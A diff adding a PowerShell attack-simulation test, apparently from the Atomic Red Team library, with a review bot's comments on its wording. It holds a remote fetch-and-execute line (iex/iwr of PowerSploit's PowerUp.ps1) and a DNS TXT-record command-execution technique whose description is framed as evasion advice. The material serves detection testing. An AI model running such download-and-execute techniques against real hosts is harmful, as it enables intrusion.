diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml
index 4fb4ecdc..1ea1fbf6 100644
--- a/atomics/T1059.001/T1059.001.yaml
+++ b/atomics/T1059.001/T1059.001.yaml
@@ -424,3 +424,20 @@ atomic_tests:
 iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
 Invoke-AllChecks
 name: powershell
+
+
+- name: Abuse Nslookup with DNS Records
+auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
+description: |
+Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
+supported_platforms:
+- windows
+reference : https://twitter.com/jstrosch/status/1237382986557001729
+executor:
+command: |
+# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
+# this would not be part of a real attack but helpful for this simulation
+function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
+powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
+name: powershell
+
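Review bot: The new test's `description` is phrased as operator advice ("Red teamer's avoid IEX ... to compromise hosts") rather than stating what the atomic simulates and what a detection should observe, which is how the neighbouring tests in this file are described; suggest `description: |` followed by `Simulates an attacker retrieving a command from a DNS TXT record via nslookup and executing it in PowerShell without IEX or Invoke-WebRequest. The nslookup function is shimmed so the executed command is always whoami.` The `reference :` key carries a stray space before the colon, inconsistent with every other key in the hunk, and I am not certain the test schema defines a `reference` field at all, so the link may be better placed in the description. Note also that the shim still invokes the real nslookup.exe against 8.8.8.8 (output discarded), so the test produces an outbound DNS query to a public resolver that a detection lab will see; the description could say so, since the test passes even when that query fails.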